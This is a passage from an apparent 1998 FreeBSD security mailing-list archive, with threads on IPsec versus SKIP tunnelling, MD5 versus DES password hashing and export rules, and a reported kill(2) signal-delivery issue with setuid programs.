platforms use SKIP. IPsec is the IP security standard, > and not SKIP. "may become" ;-) (So far as I can see it's just a set of out-dated RFCs that will hopefully be replaced by an updated set (currently in draft status) in the future, and though it's on the standards track as I understand it, there's a fair distance to go before it's written in the hardest stone the IETF writes anything in.) > No point supporting a bad standard-wannabe. Well, that depends entirely on the relative merits of the respective "standard" and non-standard technologies. I sure would support moving a non-standard into the standards track if it is superior to the currently proffered "standard". Not that I want to make any technical appraisals on the pros and cons of any of the topics being discussed here -- I'm just trying to figure out all of this stuff too, and it makes me seriously mad when companies with money to burn start pushing things by making untrue claims about them, which is exactly what I've been seeing w.r.t. IPsec and ISAKMP. I think this particular topic is far more too important to make a VHS/BETA example out of it. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 08:40:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA20481 for freebsd-security-outgoing; Fri, 29 May 1998 08:40:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA20330 for ; Fri, 29 May 1998 08:40:12 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id TAA29663; Fri, 29 May 1998 19:41:48 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id RAA13547; Fri, 29 May 1998 17:40:29 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id RAA12450; Fri, 29 May 1998 17:39:09 +0200 (CEST) Message-ID: <19980529173909.62558@deepo.prosa.dk> Date: Fri, 29 May 1998 17:39:09 +0200 From: Philippe Regnauld To: Open Systems Networking Cc: Jim Flowers , spork , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling References: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: ; from Open Systems Networking on Fri, May 29, 1998 at 08:38:01AM -0400 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Open Systems Networking writes: > > used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to > > fbsd it provides authentication and encapsulation but with no common [...] > Care to write up how you accomplished this? Regarding interoperability: http://www.rsa.com/rsa/SWAN/swan_test.htm -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 09:50:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA14846 for freebsd-security-outgoing; Fri, 29 May 1998 09:50:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA14774 for ; Fri, 29 May 1998 09:49:42 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id MAA06819; Fri, 29 May 1998 12:43:59 -0400 (EDT) Date: Fri, 29 May 1998 12:49:35 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Cory Kempf cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On 29 May 1998, Cory Kempf wrote: redirected to -security > Is there a discussion somewhere about the merits of MD5 v. DES? > E.g. what advantages one has over the other? If I recall from past memories MD5 i believe is faster. Chris -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! | E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 11:31:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA03763 for freebsd-security-outgoing; Fri, 29 May 1998 11:31:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from eddie.incantations.net ([204.180.122.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA03740 for ; Fri, 29 May 1998 11:31:14 -0700 (PDT) (envelope-from thanatos@eddie.incantations.net) Received: from localhost (thanatos@localhost) by eddie.incantations.net (8.8.8/8.8.5) with SMTP id NAA15102 for ; Fri, 29 May 1998 13:33:31 -0500 (CDT) Date: Fri, 29 May 1998 13:33:30 -0500 (CDT) From: Jason Hudgins To: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > redirected to -security > > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 i believe is faster. Which in my opinion, is not nessecarily a good thing. Jason Hudgins http://www.incantations.net/~thanatos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 12:02:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA12535 for freebsd-security-outgoing; Fri, 29 May 1998 12:02:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk ([195.8.133.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA12472 for ; Fri, 29 May 1998 12:02:26 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.8.7/8.8.5) with ESMTP id VAA00654; Fri, 29 May 1998 21:00:05 +0200 (CEST) To: Open Systems Networking cc: Cory Kempf , freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-reply-to: Your message of "Fri, 29 May 1998 12:49:35 EDT." Date: Fri, 29 May 1998 20:59:58 +0200 Message-ID: <642.896468398@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Open S ystems Networking writes: >On 29 May 1998, Cory Kempf wrote: > >redirected to -security > >> Is there a discussion somewhere about the merits of MD5 v. DES? >> E.g. what advantages one has over the other? > >If I recall from past memories MD5 i believe is faster. Sign error. MD5 is (as design parameter) slower. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 12:06:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA13438 for freebsd-security-outgoing; Fri, 29 May 1998 12:06:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (root@COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA13329 for ; Fri, 29 May 1998 12:06:16 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id PAA26320; Fri, 29 May 1998 15:05:19 -0400 (EDT) Date: Fri, 29 May 1998 15:05:19 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Jim Flowers cc: spork , Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 29 May 1998, Jim Flowers wrote: > All told, I think it's a currently usable option for someone willing to > spend the time. I have one tunnel coupling two private networks over the > Internet with full encryption and encapsulation running for six months > without a hiccup. I've also had very good experience creating a VPN between two private networks using SKIP + a custom tunneling tool. It's been up and running smoothly (including reboots of both end machines of the tunnel) for a few weeks, and one of the hosts has moved IPs three times :). I have been very happy with both its performance and stability. I admit that it was work to get the configuration right, but it's been running smoothly since then. I would rather use an IPsec tunnel, but I don't know of any IPsec LKMs I can load up without spoiling my fairly clean CVSup'd source base under -stable and -current. Robert N Watson ---- Carnegie Mellon University http://www.cmu.edu/ Trusted Information Systems http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 12:44:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA21236 for freebsd-security-outgoing; Fri, 29 May 1998 12:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA21157 for ; Fri, 29 May 1998 12:43:41 -0700 (PDT) (envelope-from adam@homeport.org) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id PAA08397; Fri, 29 May 1998 15:41:48 -0400 (EDT) From: Adam Shostack Message-Id: <199805291941.PAA08397@homeport.org> Subject: Re: MD5 v. DES? In-Reply-To: from Open Systems Networking at "May 29, 98 12:49:35 pm" To: opsys@mail.webspan.net (Open Systems Networking) Date: Fri, 29 May 1998 15:41:47 -0400 (EDT) Cc: ckempf@enigami.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Open Systems Networking wrote: | > Is there a discussion somewhere about the merits of MD5 v. DES? | > E.g. what advantages one has over the other? | | If I recall from past memories MD5 i believe is faster. Is that an advantage in the days of Crack and John the Ripper? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 12:57:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA24625 for freebsd-security-outgoing; Fri, 29 May 1998 12:57:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA24577 for ; Fri, 29 May 1998 12:57:08 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id NAA09649; Fri, 29 May 1998 13:04:56 -0700 Date: Fri, 29 May 1998 13:04:56 -0700 (PDT) From: Steve Reid To: Open Systems Networking cc: Cory Kempf , freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 i believe is faster. The MD5 password hashing scheme in FreeBSD is slower than the traditional DES hashing. Both schemes, when they were designed, were deliberately made slow to make programs like "crack" slower. DES was extended to 25 rounds instead of the usual 16, and MD5 runs hundreds(?) of iterations of the hash function. The DES scheme was designed for a time when processors were not as fast as they are now, and so "crack" is very efficient when attacking DES-based password files. The MD5-based crypt is much slower, so "crack" takes considerably longer to run. Using MD5 instead of DES will use more of your CPU cycles, but the crackers feel it _much_ more because they have to run crypt constantly until the crack run is completed, instead of just running a crypt once at login. MD5 also has the benefit of being exportable, whereas DES is subject to restrictions in many countries because it was designed for encryption. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 13:34:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA03731 for freebsd-security-outgoing; Fri, 29 May 1998 13:34:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA03490; Fri, 29 May 1998 13:33:06 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.0/8.6.10) id NAA18667; Fri, 29 May 1998 13:31:53 -0700 (PDT) Message-Id: <199805292031.NAA18667@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaasgEa; Fri May 29 13:31:50 1998 Reply-to: Cy Schubert - ITSD Open Systems Group X-Mailer: MH To: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Kill(2) Vulnerability Date: Fri, 29 May 1998 13:30:58 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of my co-workers brought this to my attention from http://www.openbsd.org/errata.html#kill. SECURITY FIX The kill(2) system call previously would permit a large set of signals to be delivered to setuid or setgid processes. If such processes were using those signals in dubious ways, this could have resulted in security problems of various kinds. The second revision of a source code patch which solves the problem is available. I haven't seen this discussed on FreeBSD-Security yet. I've looked at the CVS log for kern_sig.c, however I cannot see any fix in there for it. Has this been fixed somewhere else? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 14:12:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA03589 for freebsd-security-outgoing; Fri, 29 May 1998 14:12:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA03518 for ; Fri, 29 May 1998 14:12:08 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id RAA14378 for ; Fri, 29 May 1998 17:11:37 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id RAA23363 for ; Fri, 29 May 1998 17:11:38 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id RAA14302; Fri, 29 May 1998 17:11:37 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Fri, 29 May 1998 17:11:37 -0400 (EDT) Message-Id: <199805292111.RAA14302@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: Philippe Regnauld's message of "Fri, May 29, 1998 17:39:09 +0200" regarding "Re: FreeBSD Tunneling" id <19980529173909.62558@deepo.prosa.dk> References: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> <19980529173909.62558@deepo.prosa.dk> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ On Fri, May 29, 1998 at 17:39:09 (+0200), Philippe Regnauld wrote: ] > Subject: Re: FreeBSD Tunneling > > Regarding interoperability: > > http://www.rsa.com/rsa/SWAN/swan_test.htm The most interesting and curious thing revealed to even an outsider by the interoperability reports presented on this page is that ISAKMP/Oakley just doesn't seem to interoperate. (Although I'm sure it must be a mistake the table even claims that major ISAKMP products don't interoperate with each other....) Given what I've seen of the complexity, I've no doubt why early implementations don't interoperate either. SKIP, on the other hand, is apparently widely available, and reasonably widely interoperable. There are at least two or three SKIP implementations not mentioned in the table that I know interoperate with at least Sun's PC SKIP client, and of course with themselves. One thing I have learned about IPSec in my recent wanderings is that I've never seen anything so error prone to create and manage and as difficult to prove correct as "security associations". What a brain-dead concept. At any significant degree of complexity you'd have to live with a network sniffer plugged into your brain for weeks before you could give any reasonable degree of assurance that your network was still safe and secure. Is anyone out there writing tools (eg. filters for NFR) that will prove that a given VPN configuration is what it is supposed to be? -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 15:00:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA03731 for freebsd-security-outgoing; Fri, 29 May 1998 13:34:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA03490; Fri, 29 May 1998 13:33:06 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.0/8.6.10) id NAA18667; Fri, 29 May 1998 13:31:53 -0700 (PDT) Message-Id: <199805292031.NAA18667@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaasgEa; Fri May 29 13:31:50 1998 Reply-to: Cy Schubert - ITSD Open Systems Group X-Mailer: MH To: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Kill(2) Vulnerability Date: Fri, 29 May 1998 13:30:58 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of my co-workers brought this to my attention from http://www.openbsd.org/errata.html#kill. SECURITY FIX The kill(2) system call previously would permit a large set of signals to be delivered to setuid or setgid processes. If such processes were using those signals in dubious ways, this could have resulted in security problems of various kinds. The second revision of a source code patch which solves the problem is available. I haven't seen this discussed on FreeBSD-Security yet. I've looked at the CVS log for kern_sig.c, however I cannot see any fix in there for it. Has this been fixed somewhere else? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 16:12:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA26690 for freebsd-security-outgoing; Fri, 29 May 1998 16:12:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA26674 for ; Fri, 29 May 1998 16:12:02 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (H-135-207-24-124.research.att.com [135.207.24.124]) by adk.gr (8.8.8/8.8.5) with ESMTP id TAA24031 for ; Fri, 29 May 1998 19:11:25 -0400 (EDT) Message-Id: <199805292311.TAA24031@adk.gr> To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling Date: Fri, 29 May 1998 19:06:09 EDT From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- To: freebsd-security@freebsd.org Subject: Re: FreeBSD Tunneling Cc: Date: 05/29/98, 19:06:07 Actually, almost all vendors interoperate with each other these days. You should be looking at either the ANX or the NIST interop results, which are more recent. - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNW8/X70pBjh2h1kFAQEFXwP+IuHDkocqUUFEa6ypg7mW/0GcoNPnnP6J cuSyT875oUJhdEcR3PP8okYgy4pzBEJA+uYnxN3v120IxAk/hRiZjQSvrylc7Ejn bwiLGRHk3947gnl3j79rZd8GrPzIHWv87rPNi2bhF4bvcE/OInXnhSa860unY52c WK8JKwBdDus= =IRC4 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 17:09:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA05853 for freebsd-security-outgoing; Fri, 29 May 1998 17:09:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from iq.org (proff@polysynaptic.iq.org [203.4.184.222]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id RAA05827 for ; Fri, 29 May 1998 17:08:55 -0700 (PDT) (envelope-from proff@iq.org) Received: (qmail 674 invoked by uid 110); 30 May 1998 00:08:42 -0000 To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: Kill(2) Vulnerability References: <199805292031.NAA18667@passer.osg.gov.bc.ca> From: Julian Assange Date: 30 May 1998 10:08:41 +1000 In-Reply-To: Cy Schubert - ITSD Open Systems Group's message of "Fri, 29 May 1998 13:30:58 -0700" Message-ID: Lines: 21 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert - ITSD Open Systems Group writes: > One of my co-workers brought this to my attention from > http://www.openbsd.org/errata.html#kill. > > SECURITY FIX > The kill(2) system call previously would permit a large set > of signals to be delivered to setuid or setgid processes. If such > processes were using those signals in dubious ways, this could > have resulted in security problems of various kinds. The second > revision of a source code patch which solves the problem is > available. It's perfectly reasonable for kill(2) to deliver A Large Set Of Signals to s[gu]id programs running under the same process group. The issue here is that its possible to send signals that the code has trapped internally (like SIGALRM). This is a userland issue in my opinion. Either pull out of the process group, or deal with the signals concerned. Cheers, Julian. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 17:51:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA14248 for freebsd-security-outgoing; Fri, 29 May 1998 17:51:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c243.moon.jic.com [206.156.18.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA14225 for ; Fri, 29 May 1998 17:50:48 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id UAA19907; Fri, 29 May 1998 20:50:11 -0400 (EDT) (envelope-from gjp@gjp.erols.com) To: Open Systems Networking cc: Cory Kempf , freebsd-security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: MD5 v. DES? In-reply-to: Your message of "Fri, 29 May 1998 12:49:35 EDT." Date: Fri, 29 May 1998 20:50:11 -0400 Message-ID: <19903.896489411@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Open Systems Networking wrote in message ID : > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 i believe is faster. Actually, from what I remember, the MD5 password crypt() routine is slower than DES and also keeps more significant characters, allowing longer and more difficult to crack passwords. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 18:34:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA20886 for freebsd-security-outgoing; Fri, 29 May 1998 18:34:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20851 for ; Fri, 29 May 1998 18:34:13 -0700 (PDT) (envelope-from danny@panda.hilink.com.au) Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id LAA28999; Sat, 30 May 1998 11:33:50 +1000 (EST) Date: Sat, 30 May 1998 11:33:49 +1000 (EST) From: "Daniel O'Callaghan" To: Steve Reid cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 29 May 1998, Steve Reid wrote: > MD5 also has the benefit of being exportable, whereas DES is subject to > restrictions in many countries because it was designed for encryption. In source code, yes. It is, in fact, legal to export programs and .o files which perform a DES-based hashing such as the standard Unix password scheme. Hence, if you buy a commercial Unix OS outside the USA, you get DES style passwords, but you can't get the source, and the vendor leaves out the programs which do data-privacy encryption. The reason that hashing is exportable is that it is only useful for identification and integrity, not privacy. MD5 is a hashing-only algorithm, and so can be freely exported from the USA. DES-hashing source can't be exported because it is trivial to turn it into DES-privacy code. Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 19:38:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA29518 for freebsd-security-outgoing; Fri, 29 May 1998 19:38:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29509 for ; Fri, 29 May 1998 19:38:02 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id MAA03167; Sat, 30 May 1998 12:37:51 +1000 (EST) Date: Sat, 30 May 1998 12:37:50 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Jason Hudgins cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 29 May 1998, Jason Hudgins wrote: > > redirected to -security > > > > > Is there a discussion somewhere about the merits of MD5 v. DES? > > > E.g. what advantages one has over the other? > > > > If I recall from past memories MD5 i believe is faster. > > Which in my opinion, is not nessecarily a good thing. It also depends on what exactly you are discussing. MD5 is a one-way hash algorithm, whereas DES is an encryption algorithm with several different modes used for encryption (ecb, cbc, 3des, etc). Also, with regards to speed, if you're concerned primarily with system security, and don't require hundreds or more authentications per second (ecommerce perhaps), you should 